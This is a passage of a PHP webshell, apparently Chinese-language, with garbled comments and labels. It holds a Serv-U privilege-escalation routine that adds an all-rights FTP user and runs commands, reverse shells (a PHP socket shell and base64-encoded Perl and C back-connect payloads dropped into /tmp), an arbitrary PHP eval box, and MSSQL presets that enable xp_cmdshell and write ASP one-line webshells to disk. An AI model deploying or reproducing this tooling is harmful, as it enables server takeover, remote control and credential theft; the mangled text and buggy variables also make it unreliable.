$recvbuf = "";
$domain = "-SETDOMAIN\r\n"."-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n"."-TZOEnable=0\r\n"." TZOKey=\r\n";
$adduser = "-SETUSERSETUP\r\n"."-IP=0.0.0.0\r\n"."-PortNo=21\r\n"."-User=".$_POST['user']."\r\n"."-Password=".$_POST['password']."\r\n"."-HomeDir=c:\\\r\n"."-LoginMesFile=\r\n"."-Disable=0\r\n"."-RelPaths=1\r\n"."-NeedSecure=0\r\n"."-HideHidden=0\r\n"."-AlwaysAllowLogin=0\r\n"."-ChangePassword=0\r\n".
"-QuotaEnable=0\r\n"."-MaxUsersLoginPerIP=-1\r\n"."-SpeedLimitUp=0\r\n"."-SpeedLimitDown=0\r\n"."-MaxNrUsers=-1\r\n"."-IdleTimeOut=600\r\n"."-SessionTimeOut=-1\r\n"."-Expire=0\r\n"."-RatioUp=1\r\n"."-RatioDown=1\r\n"."-RatiosCredit=0\r\n"."-QuotaCurrent=0\r\n"."-QuotaMaximum=0\r\n".
"-Maintenance=None\r\n"."-PasswordType=Regular\r\n"."-Ratios=None\r\n"." Access=".$_POST['part']."\|RWAMELCDP\r\n";
$deldomain = "-DELETEDOMAIN\r\n"."-IP=0.0.0.0\r\n"." PortNo=21\r\n";
$sock = @fsockopen("127.0.0.1", $_POST["SUPort"], &$errno, &$errstr, 10);
$recvbuf = @fgets($sock, 1024);
echo "<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݰ<EFBFBD>: $recvbuf <br>";
$sendbuf = "USER ".$_POST["SUUser"]."\r\n";
@fputs($sock, $sendbuf, strlen($sendbuf));
echo "<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݰ<EFBFBD>: $sendbuf <br>";
$recvbuf = @fgets($sock, 1024);
echo "<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݰ<EFBFBD>: $recvbuf <br>";
$sendbuf = "PASS ".$_POST["SUPass"]."\r\n";
@fputs($sock, $sendbuf, strlen($sendbuf));
echo "<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݰ<EFBFBD>: $sendbuf <br>";
$recvbuf = @fgets($sock, 1024);
echo "<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݰ<EFBFBD>: $recvbuf <br>";
$sendbuf = "SITE MAINTENANCE\r\n";
@fputs($sock, $sendbuf, strlen($sendbuf));
echo "<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݰ<EFBFBD>: $sendbuf <br>";
$recvbuf = @fgets($sock, 1024);
echo "<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݰ<EFBFBD>: $recvbuf <br>";
$sendbuf = $domain;
@fputs($sock, $sendbuf, strlen($sendbuf));
echo "<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݰ<EFBFBD>: $sendbuf <br>";
$recvbuf = @fgets($sock, 1024);
echo "<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݰ<EFBFBD>: $recvbuf <br>";
$sendbuf = $adduser;
@fputs($sock, $sendbuf, strlen($sendbuf));
echo "<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݰ<EFBFBD>: $sendbuf <br>";
$recvbuf = @fgets($sock, 1024);
echo "<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݰ<EFBFBD>: $recvbuf <br>";
if(!empty($_POST['SUCommand']))
{
$exp = @fsockopen("127.0.0.1", "21", &$errno, &$errstr, 10);
$recvbuf = @fgets($exp, 1024);
echo "<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݰ<EFBFBD>: $recvbuf <br>";
$sendbuf = "USER ".$_POST['user']."\r\n";
@fputs($exp, $sendbuf, strlen($sendbuf));
echo "<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݰ<EFBFBD>: $sendbuf <br>";
$recvbuf = @fgets($exp, 1024);
echo "<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݰ<EFBFBD>: $recvbuf <br>";
$sendbuf = "PASS ".$_POST['password']."\r\n";
@fputs($exp, $sendbuf, strlen($sendbuf));
echo "<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݰ<EFBFBD>: $sendbuf <br>";
$recvbuf = @fgets($exp, 1024);
echo "<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݰ<EFBFBD>: $recvbuf <br>";
$sendbuf = "site exec ".$_POST["SUCommand"]."\r\n";
@fputs($exp, $sendbuf, strlen($sendbuf));
echo "<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݰ<EFBFBD>: site exec <font color=#006600>".$_POST["SUCommand"]."</font> <br>";
$recvbuf = @fgets($exp, 1024);
echo "<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݰ<EFBFBD>: $recvbuf <br>";
$sendbuf = $deldomain;
@fputs($sock, $sendbuf, strlen($sendbuf));
echo "<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݰ<EFBFBD>: $sendbuf <br>";
$recvbuf = @fgets($sock, 1024);
echo "<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݰ<EFBFBD>: $recvbuf <br>";
@fclose($exp);
}
@fclose($sock);
echo '</div>';
}
}
//<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
function backconn()
{
$ty=$_GET['ty'];
if($ty=='socket'){
@set_time_limit(0);
$system=strtoupper(substr(PHP_OS, 0, 3));
if(!extension_loaded('sockets'))
{
if($system == 'WIN'){@dl('php_sockets.dll') or die("Can't load socket");}
else{@dl('sockets.so') or die("Can't load socket");}
}
if(isset($_POST['host']) && isset($_POST['port']))
{
$host = $_POST['host'];
$port = $_POST['port'];
}else{
print<<<END
<div class="actall"><form method=post action="?s=dd&ty=socket">
<br><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:<input type="radio" name=info value="linux">Linux <input type="radio" name=info value="win" checked>Windows<br><br>
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><input type=text name=host value=""><br>
<EFBFBD>˿ڣ<EFBFBD><input type=text name=port value="1120"><br><br>
<input class="bt" type=submit name=submit value="<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>"><br><br></form></div>
END;
}
if($system=="WIN"){$env=array('path' => 'c:\\windows\\system32');}
else{$env = array('PATH' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');}
$descriptorspec = array(0 => array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w"),);
$host=gethostbyname($host);
$proto=getprotobyname("tcp");
if(($sock=socket_create(AF_INET,SOCK_STREAM,$proto))<0){die("Socket<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʧ<EFBFBD><EFBFBD>");}
if(($ret=socket_connect($sock,$host,$port))<0){die("<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʧ<EFBFBD><EFBFBD>");}
else{
$message=" PHP<48><50><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>\n";
socket_write($sock,$message,strlen($message));
$cwd=str_replace('\\','/',dirname(__FILE__));
while($cmd=socket_read($sock,65535,$proto))
{
if(trim(strtolower($cmd))=="exit"){socket_write($sock,"Bye\n"); exit;}
else{
$process = proc_open($cmd, $descriptorspec, $pipes, $cwd, $env);
if (is_resource($process)){
fwrite($pipes[0], $cmd);
fclose($pipes[0]);
$msg=stream_get_contents($pipes[1]);
socket_write($sock,$msg,strlen($msg));
fclose($pipes[1]);
$msg=stream_get_contents($pipes[2]);
socket_write($sock,$msg,strlen($msg));
$return_value = proc_close($process);
}
}
}
}
}
elseif($ty=='linux'){
$yourip = isset($_POST['yourip']) ? $_POST['yourip'] : getenv('REMOTE_ADDR');
$yourport = isset($_POST['yourport']) ? $_POST['yourport'] : '12666';
print<<<END
<div class="actall"><form method="POST" name="kform" id="kform" action="?s=dd&ty=linux">
<br><EFBFBD><EFBFBD><EFBFBD>ĵ<EFBFBD>ַ <input type="text" name="yourip" value="{$yourip}" style="width:400px"><br>
<EFBFBD><EFBFBD><EFBFBD>Ӷ˿<EFBFBD> <input type="text" name="yourport" value="12666" style="width:400px"><br>
ִ<EFBFBD>з<EFBFBD>ʽ <select name="use"><option value="perl">perl</option><option value="c">c</option></select>&nbsp;&nbsp;
<input type="submit" value="<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>" style="width:80px;"><br><br><br></form></div>
END;
if((!empty($_POST['yourip'])) && (!empty($_POST['yourport'])))
{
echo '<div class="actall">';
if($_POST['use'] == 'perl')
{
$back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
echo File_Write('/tmp/yoco_bc',base64_decode($back_connect_pl),'wb') ? '<27><><EFBFBD><EFBFBD>/tmp/yoco_bc<62>ɹ<EFBFBD><br>' : '<27><><EFBFBD><EFBFBD>/tmp/yoco_bcʧ<63><CAA7><br>';
$perlpath = Exec_Run('which perl');
$perlpath = $perlpath ? chop($perlpath) : 'perl';
echo Exec_Run($perlpath.' /tmp/yoco_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : <><D6B4><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʧ<EFBFBD><CAA7>';
}
if($_POST['use'] == 'c')
{
$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJybSAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJsZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7DQogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
echo File_Write('/tmp/yoco_bc.c',base64_decode($back_connect_c),'wb') ? '<27><><EFBFBD><EFBFBD>/tmp/yoco_bc.c<>ɹ<EFBFBD><br>' : '<27><><EFBFBD><EFBFBD>/tmp/yoco_bc.cʧ<63><CAA7><br>';
$res = Exec_Run('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
@unlink('/tmp/yoco.c');
echo Exec_Run('/tmp/yoco_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : <><D6B4><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʧ<EFBFBD><CAA7>';
}
echo '<br><3E><><EFBFBD><EFBFBD><EFBFBD>Գ<EFBFBD><D4B3><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ӷ˿<D3B6> (nc -l -n -v -p '.$_POST['yourport'].') </div>';
}
return true;
}else{
print<<<END
<div class="actall"><pre>
<br><a href="?s=dd&ty=linux"> [ C/Perl <EFBFBD><EFBFBD><EFBFBD><EFBFBD> - Linux ] </a><br><br>
<h5><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>linux<EFBFBD><EFBFBD>Ȩ<EFBFBD>еķ<EFBFBD><EFBFBD><EFBFBD>cmd<EFBFBD><EFBFBD><EFBFBD>ӡ<EFBFBD><br>
ԭ<EFBFBD><EFBFBD><EFBFBD>ǽ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ӹ<EFBFBD><EFBFBD>ܵ<EFBFBD>perl<EFBFBD>ű<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>C<EFBFBD><EFBFBD><EFBFBD><EFBFBD>д<EFBFBD><EFBFBD>/tmp<EFBFBD>ļ<EFBFBD><EFBFBD>в<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><br>
<EFBFBD><EFBFBD>php<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ִ<EFBFBD>к<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ܵ<EFBFBD><EFBFBD>·<EFBFBD><EFBFBD><EFBFBD>ʧ<EFBFBD><EFBFBD><br>
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>nc<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>˿ڣ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>nc -vv -l -p 12666</h5><br><br><br>
<a href="?s=dd&ty=socket"> [ Socket<EFBFBD><EFBFBD><EFBFBD><EFBFBD> - Windows ] </a><br><br>
<h5>PHPʹ<EFBFBD><EFBFBD>Socket<EFBFBD><EFBFBD><EFBFBD><EFBFBD>cmdshell<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ӡ<EFBFBD>Webshell<EFBFBD><EFBFBD><EFBFBD>ڷ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ΪWindowsϵͳ<br>
Ŀǰû<EFBFBD>з<EFBFBD><EFBFBD><EFBFBD><EFBFBD>з<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Socket<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ƣ<EFBFBD><EFBFBD><EFBFBD>php_sockets<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϊopen/enable<br>
<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͨ<EFBFBD><EFBFBD>phpinfo()<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ƿ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>php_socket<EFBFBD><EFBFBD><EFBFBD><EFBFBD><br>
Socket<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ӵ<EFBFBD><EFBFBD><EFBFBD>;<EFBFBD><EFBFBD><EFBFBD>ڵ<EFBFBD>PHP<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>˲<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ִ<EFBFBD>к<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ִ<EFBFBD><EFBFBD><br>
<EFBFBD><EFBFBD>ҪäĿ<EFBFBD><EFBFBD><EFBFBD>ӣ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ɷ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Դ<EFBFBD>ľ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>غ<EFBFBD><EFBFBD><EFBFBD><br>
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>nc.exe<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>˿ڣ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>nc -vv -l -p 5555<br></h5>
</pre></div>
END;
}
}
//evalִ<6C><D6B4>php<68><70><EFBFBD><EFBFBD>
function phpcode()
{
print<<<END
<div class="actall"><h5><EFBFBD><EFBFBD><EFBFBD><EFBFBD>php<EFBFBD><EFBFBD><EFBFBD><EFBFBD>:<h5></div>
<form action="?s=ff" method="POST">
<div class="actall"><textarea name="phpcode" rows="20" cols="80">phpinfo();/*print_r(apache_get_modules());*/</textarea></div><br />
<div><input class="bt" type="submit" value="EVALִ<EFBFBD><EFBFBD>"></div><br></form>
END;
$phpcode = $_POST['phpcode'];
$phpcode = trim($phpcode);
if($phpcode){
if(!preg_match('#<\?#si',$phpcode)){$phpcode = "<?php\n\n{$phpcode}\n\n?>";}
eval("?".">$phpcode<?php ");
echo '<br><br>';
}
return false;
}
//<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD><DDBF><EFBFBD><EFBFBD><EFBFBD>
function otherdb(){
$db = isset($_GET['db']) ? $_GET['db'] : 'ms';
print<<<END
<form method="POST" name="dbform" id="dbform" action="?s=gg&db={$db}" enctype="multipart/form-data">
<div class="actall">
<a href="?s=gg&db=ms"> &nbsp; MSSQL &nbsp;</a>
<a href="?s=gg&db=ora"> &nbsp; Oracle &nbsp;</a>
<a href="?s=gg&db=ifx"> &nbsp; InforMix &nbsp;</a>
<a href="?s=gg&db=fb"> &nbsp; FireBird &nbsp;</a>
<a href="?s=gg&db=db2">&nbsp; DB2 &nbsp;</a></div></form>
END;
if ($db=="ms"){
$mshost = isset($_POST['mshost']) ? $_POST['mshost']:'localhost';
$msuser = isset($_POST['msuser']) ? $_POST['msuser'] : 'sa';
$mspass = isset($_POST['mspass']) ? $_POST['mspass'] : '';
$msdbname = isset($_POST['msdbname']) ? $_POST['msdbname'] : 'master';
$msaction = isset($_POST['action']) ? $_POST['action'] : '';
$msquery = isset($_POST['mssql']) ? $_POST['mssql'] : '';
$msquery = stripslashes($msquery);
print<<<END
<div class="actall">
<form method="POST" name="msform" action="?s=gg&db=ms">
Host:<input type="text" name="mshost" value="{$mshost}" style="width:100px">
User:<input type="text" name="msuser" value="{$msuser}" style="width:100px">
Pass:<input type="text" name="mspass" value="{$mspass}" style="width:100px">
Dbname:<input type="text" name="msdbname" value="{$msdbname}" style="width:100px"><br>
<script language="javascript">
function msFull(i){
Str = new Array(11);
Str[0] = "";
Str[1] = "select @@version;";
Str[2] = "select name from sysdatabases;";
Str[3] = "select name from sysobject where type='U';";
Str[4] = "select name from syscolumns where id=Object_Id('table_name');";
Str[5] = "Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll');";
Str[6] = "Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll');";
Str[7] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;";
Str[8] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;";
Str[9] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;";
Str[10] = "Exec master.dbo.xp_cmdshell 'net user';";
Str[11] = "Declare @s int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^<%execute(request(char(35)))%^> > c:\\\\1.asp';";
Str[12] = "sp_makewebtask @outputfile='d:\\\\web\\\\bin.asp',@charset=gb2312,@query='select ''<%execute(request(chr(35)))%>''' ";
msform.mssql.value = Str[i];
return true;
}
</script>
<textarea name="mssql" style="width:600px;height:200px;">{$msquery}</textarea><br>
<select onchange="return msFull(options[selectedIndex].value)">
<option value="0" selected>ִ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></option>
<option value="1"><EFBFBD><EFBFBD>ʾ<EFBFBD></option>
<option value="2"><EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD></option>
<option value="3"><EFBFBD><EFBFBD><EFBFBD><EFBFBD></option>
<option value="4"><EFBFBD>ֶ<EFBFBD></option>
<option value="5">sp_oacreate</option>
<option value="6">xp_cmdshell</option>
<option value="7">xp_cmdshell(2005)</option>
<option value="8">sp_oacreate(2005)</option>
<option value="9"><EFBFBD><EFBFBD><EFBFBD><EFBFBD>openrowset(2005)</option>
<option value="10">xp_cmdshell exec</option>
<option value="10">sp_oamethod exec</option>
<option value="11">sp_makewebtask</option>
</select>
<input type="hidden" name="action" value="msquery">
<input class="bt" type="submit" value="Query"></form></div>
END;
if ($msaction == 'msquery'){
$msconn= mssql_connect ($mshost , $msuser, $mspass);
mssql_select_db($msdbname,$msconn) or die("connect error :" .mssql_get_last_message());
$msresult = mssql_query($msquery) or die(mssql_get_last_message());
echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">'."\n<tr>\n";
for ($i=0; $i<mssql_num_fields($msresult); $i++)
{echo '<td><b>'.mssql_field_name($msresult, $i)."</b></td>\n";}
echo "</tr>\n";
mssql_data_seek($result, 0);
while ($msrow=mssql_fetch_row($msresult))
{
echo "<tr>\n";
for ($i=0; $i<mssql_num_fields($msresult); $i++ )
{echo '<td>'."$msrow[$i]".'</td>';}
echo "</tr>\n";
}
echo "</table></font>";
mssql_free_result($msresult);
mssql_close();
}
}
elseif ($db=="ora"){
$orahost = isset($_POST['orahost']) ? $_POST['orahost'] : 'localhost';
$oraport = isset($_POST['oraport']) ? $_POST['oraport'] : '1521';
$orauser = isset($_POST['orauser']) ? $_POST['orauser'] : 'root';
$orapass = isset($_POST['orapass']) ? $_POST['orapass'] : '123456';
$orasid = isset($_POST['orasid']) ? $_POST['orasid'] : 'ORCL';
$oraaction = isset($_POST['action']) ? $_POST['action'] : '';
$oraquery = isset($_POST['orasql']) ? $_POST['orasql'] : '';
$oraquery = stripslashes($oraquery);
print<<<END
<form method="POST" name="oraform" action="?s=gg&db=ora">
<div class="actall">
Host:<input type="text" name="orahost" value="{$orahost}" style="width:100px">
Port:<input type="text" name="oraport" value="{$oraport}" style="width:50px">
User:<input type="text" name="orauser" value="{$orauser}" style="width:80px">
Pass:<input type="text" name="orapass" value="{$orapass}" style="width:100px">
SID:<input type="text" name="orasid" value="{$orasid}" style="width:50px"><br>
<script language="javascript">
function oraFull(i){
Str = new Array(5);
Str[0] = "";
Str[1] = "select version();";
Str[2] = "SELECT NAME FROM V$DATABASE";
Str[3] = "select * From all_objects where object_type='TABLE'";
Str[4] = "select column_name from user_tab_columns where table_name='table1'";
oraform.orasql.value = Str[i];
return true;
}
</script>
<textarea name="orasql" style="width:600px;height:200px;">{$oraquery}</textarea><br>
<select onchange="return oraFull(options[selectedIndex].value)">
<option value="0" selected>ִ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></option>
<option value="1"><EFBFBD><EFBFBD>ʾ<EFBFBD></option>
<option value="2"><EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD></option>
<option value="3"><EFBFBD><EFBFBD><EFBFBD><EFBFBD></option>
<option value="4"><EFBFBD>ֶ<EFBFBD></option>
</select>
<input type="hidden" name="action" value="myquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
if($oraaction == 'oraquery'){
$oralink=OCILogon($orauser,$orapass,"(DEscriptION=(ADDRESS=(PROTOCOL =TCP)(HOST=$orahost)(PORT = $oraport))(CONNECT_DATA =(SID=$orasid)))") or die(ocierror());
$oraresult=ociparse($oralink,$oraquery) or die(ocierror());
$orarow=oci_fetch_row($oraresult);
echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">'."\n<tr>\n";
for ($i=0; $i<oci_num_fields($oraresult); $i++)
{echo '<td><b>'.oci_field_name($oraresult, $i)."</b></td>\n";}
echo "</tr>\n";
ociresult($oraresult, 0);
while ($orarow=ora_fetch_row($oraresult))
{
echo "<tr>\n";
for ($i=0; $i<ora_num_fields($result); $i++ )
{echo '<td>'."$orarow[$i]".'</td>';}
echo "</tr>\n";
}
echo "</table></font>";
oci_free_statement($oraresult);
ocilogoff();
}
}
elseif ($db == "ifx"){
$ifxuser = isset($_POST['ifxuser']) ? $_POST['ifxuser'] : 'root';
$ifxpass = isset($_POST['ifxpass']) ? $_POST['ifxpass'] : '123456';
$ifxdbname = isset($_POST['ifxdbname']) ? $_POST['ifxdbname'] : 'ifxdb';
$ifxaction = isset($_POST['action']) ? $_POST['action'] : '';
$ifxquery = isset($_POST['ifxsql']) ? $_POST['ifxsql'] : '';
$ifxquery = stripslashes($ifxquery);
print<<<END
<form method="POST" name="ifxform" action="?s=gg&db=ifx">
<div class="actall">Dbname:<input type="text" name="ifxhost" value="{$ifxdbname}" style="width:100px">
User:<input type="text" name="ifxuser" value="{$ifxuser}" style="width:100px">
Pass:<input type="text" name="ifxpass" value="{$ifxpass}" style="width:100px"><br>
<script language="javascript">
function ifxFull(i){
Str = new Array(11);
Str[0] = "";
Str[1] = "select dbservername from sysobjects;";
Str[2] = "select name from sysdatabases;";
Str[3] = "select tabname from systables;";
Str[4] = "select colname from syscolumns where tabid=n;";
Str[5] = "select username,usertype,password from sysusers;";
ifxform.ifxsql.value = Str[i];
return true;
}
</script>
<textarea name="ifxsql" style="width:600px;height:200px;">{$ifxquery}</textarea><br>
<select onchange="return ifxFull(options[selectedIndex].value)">
<option value="0" selected>ִ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></option>
<option value="1"><EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></option>
<option value="1"><EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD></option>
<option value="2"><EFBFBD><EFBFBD><EFBFBD><EFBFBD></option>
<option value="3"><EFBFBD>ֶ<EFBFBD></option>
<option value="4">hashes</option>
</select>
<input type="hidden" name="action" value="ifxquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
if($ifxaction == 'ifxquery'){
$ifxlink = ifx_connect($ifcdbname, $ifxuser, $ifxpass) or die(ifx_errormsg());
$ifxresult = ifx_query($ifxquery,$ifxlink) or die (ifx_errormsg());
$ifxrow=ifx_fetch_row($ifxresult);
echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">'."\n<tr>\n";
for($i=0; $i<ifx_num_fields($ifxresult); $i++)
{echo '<td><b>'.ifx_fieldproperties($ifxresult)."</b></td>\n";}
echo "</tr>\n";
